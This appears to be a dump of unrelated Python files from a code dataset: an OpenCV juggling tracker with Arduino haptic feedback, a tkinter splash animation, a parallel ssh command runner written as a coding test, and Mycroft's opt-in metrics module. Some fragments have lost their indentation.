trajectory[index] = trajectory[index][1:] + [center]
else:
trajectory[index].append(center)
end_of_parabola = False
# draws trajectory up to penultimate point
for i in range(1, len(trajectory[index]) - 1):
before = trajectory[index][i - 1]
after = trajectory[index][i]
if not (before[1] < limit_height) or not (after[1] < limit_height):
if end_of_parabola:
break
continue
end_of_parabola = True
# line_weight = int(np.sqrt(num_data_points / float(i + 1)) * 2)
cv2.line(frame,
before,
after,
trajectory_color,
2)
# calculates drop time
if throw_time > 0:
time_diff = time.time() - throw_time
if time_diff > 1:
drop_time += time_diff - 3
throw_time = time.time()
# last point in trajectory
i = len(trajectory[index]) - 1
before = trajectory[index][i - 1]
after = trajectory[index][i]
cv2.line(frame,
before,
after,
trajectory_color,
2)
# checks if it is a left or right throw
if after[0] > before[0]: # if the ball is moving to the right in footage
left_throw = True
elif after[0] < before[0]: # if the ball is moving to the left in footage
right_throw = True
# if the trajectory is going up and is near the top of the frame
falling = (after[1] < before[1]) and (before[1] < limit_height)
if not falling:
wait_for_peak[index] = True
# TODO limit the following actions to only two and three-ball juggles
if falling and wait_for_peak[index]:
if left_throw and haptics_on:
wait_for_peak[index] = False
left_throw = False
ser.write(TURN_ON_LEFT)
print("\nVibrate Left\n")
elif right_throw and haptics_on:
wait_for_peak[index] = False
right_throw = False
ser.write(TURN_ON_RIGHT)
print("\nVibrate Right\n")
# draws a line showing the height one must throw the ball for detection
cv2.line(frame,
(0, limit_height),
(screen_width, limit_height),
(0, 0, 0),
1)
# If "c" is pressed, enter calibration sequence
if key == 99:
colorcal = {}
cv2.setTrackbarPos('H Upper', 'tool', defaultcal[color[len(colorcal)]][0][0])
cv2.setTrackbarPos('S Upper', 'tool', defaultcal[color[len(colorcal)]][0][1])
cv2.setTrackbarPos('V Upper', 'tool', defaultcal[color[len(colorcal)]][0][2])
cv2.setTrackbarPos('H Lower', 'tool', defaultcal[color[len(colorcal)]][1][0])
cv2.setTrackbarPos('S Lower', 'tool', defaultcal[color[len(colorcal)]][1][1])
cv2.setTrackbarPos('V Lower', 'tool', defaultcal[color[len(colorcal)]][1][2])
while len(colorcal) < len(defaultcal):
frame = cv2.flip(cam.read(), 1)
hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
key = cv2.waitKey(1) & 0xff
# hue upper lower
hu = cv2.getTrackbarPos('H Upper', 'tool')
hl = cv2.getTrackbarPos('H Lower', 'tool')
# saturation upper lower
su = cv2.getTrackbarPos('S Upper', 'tool')
sl = cv2.getTrackbarPos('S Lower', 'tool')
# value upper lower
vu = cv2.getTrackbarPos('V Upper', 'tool')
vl = cv2.getTrackbarPos('V Lower', 'tool')
# handles more orangish hint of red
if color[len(colorcal)] == 'red':
lower_hsv = np.array([0, sl, vl])
upper_hsv = np.array([hl, su, vu])
mask1 = cv2.inRange(hsv, lower_hsv, upper_hsv)
lower_hsv = np.array([hu, sl, vl])
upper_hsv = np.array([179, su, vu])
mask2 = cv2.inRange(hsv, lower_hsv, upper_hsv)
# make a mask with current ball color
mask = cv2.bitwise_or(mask1, mask2)
lower_hsv = np.array([hl, sl, vl])
upper_hsv = np.array([hu, su, vu])
else:
lower_hsv = np.array([hl, sl, vl])
upper_hsv = np.array([hu, su, vu])
# make a mask with current ball color
mask = cv2.inRange(hsv, lower_hsv, upper_hsv)
mask = cv2.erode(mask, None, iterations=2)
mask = cv2.dilate(mask, None, iterations=2)
res = cv2.bitwise_and(frame, frame, mask=mask)
if key == 32:
defaultcal[color[len(colorcal)]] = [upper_hsv, lower_hsv]
colorcal[color[len(colorcal)]] = [upper_hsv, lower_hsv]
if len(colorcal) < len(defaultcal):
cv2.setTrackbarPos('H Upper', 'tool', defaultcal[color[len(colorcal)]][0][0])
cv2.setTrackbarPos('S Upper', 'tool', defaultcal[color[len(colorcal)]][0][1])
cv2.setTrackbarPos('V Upper', 'tool', defaultcal[color[len(colorcal)]][0][2])
cv2.setTrackbarPos('H Lower', 'tool', defaultcal[color[len(colorcal)]][1][0])
cv2.setTrackbarPos('S Lower', 'tool', defaultcal[color[len(colorcal)]][1][1])
cv2.setTrackbarPos('V Lower', 'tool', defaultcal[color[len(colorcal)]][1][2])
if len(colorcal) < len(defaultcal):
text = 'calibrating {}'.format(color[len(colorcal)])
cv2.putText(res, text, (20, 460), cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255), 1, cv2.LINE_AA)
cv2.imshow("default", res)
# quit on escape key.
if key == 27:
throw_time = 0
drop_time = 0
checker_time = time.time()
break
if key == 83:
# saves the calibration to a file
file = open(calibrationfile, "wb")
pickle.dump(defaultcal, file)
file.close()
print("file saved")
if time.time() - checker_time > time_limit: # 30 seconds have passed since last check
if drop_time / time_limit <= .1 and throw_time != 0:
if not haptics_on:
msg = "You may now juggle one more ball"
haptics_on = not haptics_on # swaps between on and off when upgrading
elif drop_time / time_limit >= .5 or throw_time == 0:
if not haptics_on:
haptics_on = True
msg = "You should juggle one less ball"
throw_time = 0
drop_time = 0
checker_time = time.time()
# show result
frame = cv2.flip(frame, 1)
cv2.putText(frame, msg, (150, 150), cv2.FONT_HERSHEY_TRIPLEX, 0.5, (0, 0, 0), 1, cv2.LINE_AA)
cv2.imshow("default", frame)
if msg != '': # remove actuation message
msg_frame_count += 1
if msg_frame_count >= msg_frames:
msg_frame_count = 0
msg = ''
# end of scan()
cv2.destroyAllWindows()
cam.stop()
if __name__ == '__main__':
    # Serial link to the haptic-feedback Arduino; port name is
    # Windows-specific ('COM3') -- adjust for the connected board.
    port = 'COM3'  # change based on Arduino
    baudrate = 115200  # change based on Arduino
    ser = serial.Serial(port, baudrate, writeTimeout=0)
    time.sleep(2)  # give the Arduino time to reset after the port opens
    cv2.namedWindow('default', cv2.WINDOW_NORMAL)
    cv2.namedWindow('tool', cv2.WINDOW_NORMAL)
    try:
        scan()
    finally:
        # close the port even if scan() raises, so the Arduino
        # isn't left holding a locked serial connection
        ser.close()
|
startup_flair.pyw | import time, os, threading as thread, pathlib
from tkinter import *
from PIL import Image, ImageTk
PATH = str(pathlib.Path(__file__).parent.absolute())
scalar = 0.6
def doAnimation():
    """Show a borderless, centered splash image and run its fade animation."""
    root = Tk()
    root.configure(bg='black')
    root.frame = Frame(root, borderwidth=2, relief=RAISED)
    root.wm_attributes('-topmost', 1)  # keep the splash above other windows
    root.overrideredirect(1)  # no title bar / window chrome
    img_ = Image.open(os.path.join(PATH, 'default_assets', 'loading_splash.png'))
    # Image.ANTIALIAS was removed in Pillow 10; LANCZOS is the same filter
    # and has existed since Pillow 2.7, so this stays backward compatible.
    img = ImageTk.PhotoImage(img_.resize(
        (int(img_.width * scalar), int(img_.height * scalar)),
        resample=Image.LANCZOS))
    # center the window on the screen
    root.geometry('{}x{}+{}+{}'.format(
        img.width(), img.height(),
        int((root.winfo_screenwidth() - img.width()) / 2),
        int((root.winfo_screenheight() - img.height()) / 2)))
    lbl = Label(root, image=img)
    lbl.image = img  # keep a reference so Tk's image isn't garbage collected
    lbl.pack()
    root.attributes('-alpha', 0)  # start fully transparent for the fade-in
    thread.Thread(target=lambda: anim(root)).start()
    root.mainloop()
def anim(root):
    """Fade *root* in, hold it, fade it out, then hard-kill the process.

    NOTE(review): runs on a worker thread but calls Tk methods on *root*;
    tkinter is not thread-safe, so this relies on implementation behavior.
    """
    alpha = 0.0
    step = 0.01
    # fade in: 100 steps of +0.01, one per `step` seconds (~1 s total)
    for i in range(int(1 / step)):
        root.attributes('-alpha', alpha)
        alpha += step
        time.sleep(step)
    # hold the splash fully visible
    time.sleep(2)
    # fade out: 50 steps of -0.02 with quarter-step sleeps -> faster fade
    for i in range(int(1 / (2*step))):
        root.attributes('-alpha', alpha)
        alpha -= 2*step
        time.sleep(step/4)
    # hard exit; signal 9 is not a real signal on Windows -- os.kill maps
    # it to TerminateProcess there. NOTE(review): confirm on target platform.
    os.kill(os.getpid(), 9)
doAnimation() |
python_test04.py | #!env python
# -*- coding: utf-8 -*-
"""
Python test 04:
Run user-selected command on many servers (user provided as param) with
ssh in parallel, collect output from all nodes. Script should print
collected output from all nodes on stdout, w/o using temp files
"""
# This is free and unencumbered software released into the public domain.
#
# Anyone is free to copy, modify, publish, use, compile, sell, or
# distribute this software, either in source code form or as a compiled
# binary, for any purpose, commercial or non-commercial, and by any
# means.
#
# In jurisdictions that recognize copyright laws, the author or authors
# of this software dedicate any and all copyright interest in the
# software to the public domain. We make this dedication for the benefit
# of the public at large and to the detriment of our heirs and
# successors. We intend this dedication to be an overt act of
# relinquishment in perpetuity of all present and future rights to this
# software under copyright law.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
import sys
import errno
# we need >= 3.4 b/c of queue, threading module naming changes
# yeah, if it is needed we can support 2.x and 3.x branches, but hey
# this is kinda out of the scope, right? :D
try:
assert sys.version_info >= (3,4)
except AssertionError:
print("ERROR: Python >= 3.4 is REQUIRED")
sys.exit(errno.ENOPKG)
import shlex
import queue
import threading
import subprocess
import argparse
import logging
__author__ = "Oleksii S. Malakhov <brezerk@brezblock.org.ua>"
__license__ = "CC0"
# setup logger
logger = logging.getLogger('spam_application')
logger.setLevel(logging.DEBUG)
class Singleton(type):
    """Metaclass that hands out a single shared instance per class."""

    _instances = {}

    def __call__(cls, *args, **kwargs):
        # EAFP: the common case (instance exists) is a plain dict lookup
        try:
            return cls._instances[cls]
        except KeyError:
            instance = super().__call__(*args, **kwargs)
            cls._instances[cls] = instance
            return instance
class RCHandler(metaclass=Singleton):
    """Process-wide accumulator of child-process return codes.

    The original used Python-2 style ``__metaclass__ = Singleton``, which
    is silently ignored on Python 3 (this script asserts >= 3.4), so the
    class was never actually a singleton.  Declaring the metaclass in the
    class header restores the intended behavior.
    """

    def __init__(self):
        # running sum of return codes; non-zero means some command failed
        self.rc__ = 0

    def addRC(self, rc):
        """Accumulate one command's return code."""
        self.rc__ += rc

    def getRC(self):
        """Return the accumulated return code."""
        return self.rc__
rc_handler = RCHandler()
# ok. let's define some custom exceptions
class ValidationError(Exception):
    """Raised when a user-supplied command or address fails validation."""

    def __init__(self, message):
        super().__init__(message)
thread_fault = False
def worker():
    """Queue consumer: run queued ssh jobs until a ``None`` sentinel arrives."""
    # iter() turns the blocking q.get into an iterator that stops at the
    # None sentinel -- the same contract as the original while/break loop
    for item in iter(q.get, None):
        run_process(item['addr'], item['command'])
        q.task_done()
def die(message):
    """Log *message* as an error and terminate with EAGAIN."""
    logger.error(message)
    # sys.exit(code) is defined as raising SystemExit(code)
    raise SystemExit(errno.EAGAIN)
def validate_command(command):
    """Ensure *command* is non-empty.

    Probably should be hardened further (e.g. shlex-based parsing).

    command: command string to validate
    """
    if command:
        return
    raise ValidationError("Error: empty command")
def validate_addr(addr):
    """Ensure *addr* is non-empty.

    FIXME: could be tightened with a regexp / hostname check.

    addr: address to validate
    """
    if addr:
        return
    raise ValidationError("Error: empty address")
def run_process(addr, command):
    """Run *command* on *addr* via ssh and print its output line by line.

    addr: remote host address
    command: command string; split with shlex before being passed to ssh
    Side effects: accumulates the child's return code in the global
    rc_handler and prints each output line prefixed with the host address.
    """
    try:
        args = shlex.split("ssh %s %s" % (addr, command))
        # communicate() drains the pipe while waiting, avoiding the
        # deadlock wait()-then-read can cause when output fills the pipe
        with subprocess.Popen(args, stdout=subprocess.PIPE) as proc:
            stdout = proc.communicate()[0].decode("utf-8")
        rc_handler.addRC(proc.returncode)
        if proc.returncode != 0:
            logger.error('Command %s on host %s failed' % (command, addr))
        else:
            for line in stdout.splitlines():
                print("%s: %s" % (addr, line))
    except Exception as exp:
        # the original interpolated three %s placeholders with a single
        # string, which raised TypeError inside the handler itself
        logger.error('Command %s on host %s failed: %s'
                     % (command, addr, exp))
if __name__ == "__main__":
    logger.warning("Hello, my konfu is the best! :P")
    parser = argparse.ArgumentParser(description="""Run user-selected command
    on many servers via ssh in parallel, collect output from all nodes.""")
    parser.add_argument('--addr', nargs='+',
                        help='Server address',
                        required=True)
    parser.add_argument('--command', help='User-seelcted command',
                        required=True)
    ns = parser.parse_args()
    command = ns.command
    addrs = ns.addr
    # probable can be a param
    workers_count = 4
    try:
        # validate everything up front so we fail before spawning threads
        validate_command(command)
        for addr in addrs:
            validate_addr(addr)
        # work queue shared with worker() via the module-level name `q`
        q = queue.Queue()
        threads = []
        for i in range(workers_count):
            t = threading.Thread(target=worker)
            t.start()
            threads.append(t)
        # one queue item per host; workers pull and run them in parallel
        for addr in addrs:
            item = {'addr': addr, 'command': command}
            q.put(item)
        # block until every queued job has been task_done()'d
        q.join()
        # one None sentinel per worker tells each thread to exit
        for i in range(workers_count):
            q.put(None)
        for t in threads:
            t.join()
    except ValidationError as exp:
        die(exp)
    # exit with the accumulated return code (0 only if every command passed)
    sys.exit(rc_handler.getRC())
|
__init__.py | # Copyright 2017 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
from queue import Queue, Empty
import threading
import time
import requests
from mycroft.api import DeviceApi, is_paired
from mycroft.configuration import Configuration
from mycroft.session import SessionManager
from mycroft.util.log import LOG
from mycroft.version import CORE_VERSION_STR
from copy import copy
class _MetricSender(threading.Thread):
"""Thread responsible for sending metrics data."""
def __init__(self):
super().__init__()
self.queue = Queue()
self.daemon = True
self.start()
def run(self):
while True:
time.sleep(30)
try:
while True: # Try read the queue until it fails
report_metric(*self.queue.get_nowait())
time.sleep(0.5)
except Empty:
pass # If the queue is empty just continue the loop
except Exception as e:
LOG.error('Could not send Metrics: {}'.format(repr(e)))
_metric_uploader = _MetricSender()
def report_metric(name, data):
    """
    Report a general metric to the Mycroft servers

    Args:
        name (str): Name of metric. Must use only letters and hyphens
        data (dict): JSON dictionary to report. Must be valid JSON
    """
    try:
        # upload only when the device is paired and the user has opted in
        if is_paired() and Configuration().get()['opt_in']:
            DeviceApi().report_metric(name, data)
    except requests.RequestException as e:
        # network failures are logged, never raised to the caller
        LOG.error('Metric couldn\'t be uploaded, due to a network error ({})'
                  .format(e))
def report_timing(ident, system, timing, additional_data=None):
    """Queue a standardized timing report for background upload.

    Args:
        ident (str): identifier of user interaction
        system (str): system that generated the report
        timing (Stopwatch): stopwatch object with recorded timing
        additional_data (dict): related data merged into the report
    """
    # shallow-copy the caller's dict so it is never mutated
    report = dict(additional_data or {})
    report['id'] = ident
    report['system'] = system
    report['start_time'] = timing.timestamp
    report['time'] = timing.time
    _metric_uploader.queue.put(('timing', report))
class Stopwatch:
    """
    Simple time measuring class.

    Can be used as a context manager::

        with Stopwatch() as sw:
            ...
        print(sw.time)
    """

    def __init__(self):
        self.timestamp = None  # start time of the current measurement
        self.time = None       # duration of the last completed measurement

    def start(self):
        """
        Start a time measurement
        """
        self.timestamp = time.time()

    def lap(self):
        """Return seconds since start (or previous lap) and restart."""
        cur_time = time.time()
        start_time = self.timestamp
        self.timestamp = cur_time
        return cur_time - start_time

    def stop(self):
        """
        Stop a running time measurement. returns the measured time
        """
        cur_time = time.time()
        start_time = self.timestamp
        self.time = cur_time - start_time
        return self.time

    def __enter__(self):
        """
        Start stopwatch when entering with-block.
        """
        self.start()
        # return self so `with Stopwatch() as sw:` binds the stopwatch;
        # the original returned None, making the `as` target useless
        return self

    def __exit__(self, tpe, value, tb):
        """
        Stop stopwatch when exiting with-block.
        """
        self.stop()

    def __str__(self):
        cur_time = time.time()
        if self.timestamp:
            return str(self.time or cur_time - self.timestamp)
        else:
            return 'Not started'
class MetricsAggregator:
    """
    MetricsAggregator is not threadsafe, and multiple clients writing the
    same metric "concurrently" may result in data loss.
    """

    def __init__(self):
        # clear() both resets and initializes every metric store, removing
        # the duplicated initialization the original carried in __init__
        self.clear()

    def increment(self, name, value=1):
        """Add *value* to the named counter (creating it at 0)."""
        self._counters[name] = self._counters.get(name, 0) + value

    def timer(self, name, value):
        """Append a timing sample to the named timer series.

        The original built two fresh lists on a missing key and discarded
        one; setdefault does the same job in a single step.
        """
        self._timers.setdefault(name, []).append(value)

    def level(self, name, value):
        """Record the current level (gauge-style value) for *name*."""
        self._levels[name] = value

    def clear(self):
        """Reset every metric store, re-attaching the core version attribute."""
        self._counters = {}
        self._timers = {}
        self._levels = {}
        self._attributes = {}
        self.attr("version", CORE_VERSION_STR)

    def attr(self, name, value):
        """Set a free-form attribute reported with every flush."""
        self._attributes[name] = value

    def flush(self):
        """Publish all collected metrics in a background thread and reset."""
        publisher = MetricsPublisher()
        payload = {
            'counters': self._counters,
            'timers': self._timers,
            'levels': self._levels,
            'attributes': self._attributes
        }
        self.clear()
        count = (len(payload['counters']) + len(payload['timers']) +
                 len(payload['levels']))
        if count > 0:
            # publish off-thread so flush() never blocks on the network
            def publish():
                publisher.publish(payload)
            threading.Thread(target=publish).start()
class MetricsPublisher:
    """Thin HTTP client for posting metric payloads to the configured server.

    url/enabled fall back to the 'server' section of the runtime
    configuration when not given explicitly.
    """

    def __init__(self, url=None, enabled=False):
        conf = Configuration().get()['server']
        self.url = url or conf['url']
        self.enabled = enabled or conf['metrics']

    def publish(self, events):
        """POST *events* as JSON, attaching the current session id if absent."""
        if 'session_id' not in events:
            session_id = SessionManager.get().session_id
            events['session_id'] = session_id
        # when metrics are disabled this silently does nothing
        if self.enabled:
            requests.post(
                self.url,
                headers={'Content-Type': 'application/json'},
                data=json.dumps(events), verify=True)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.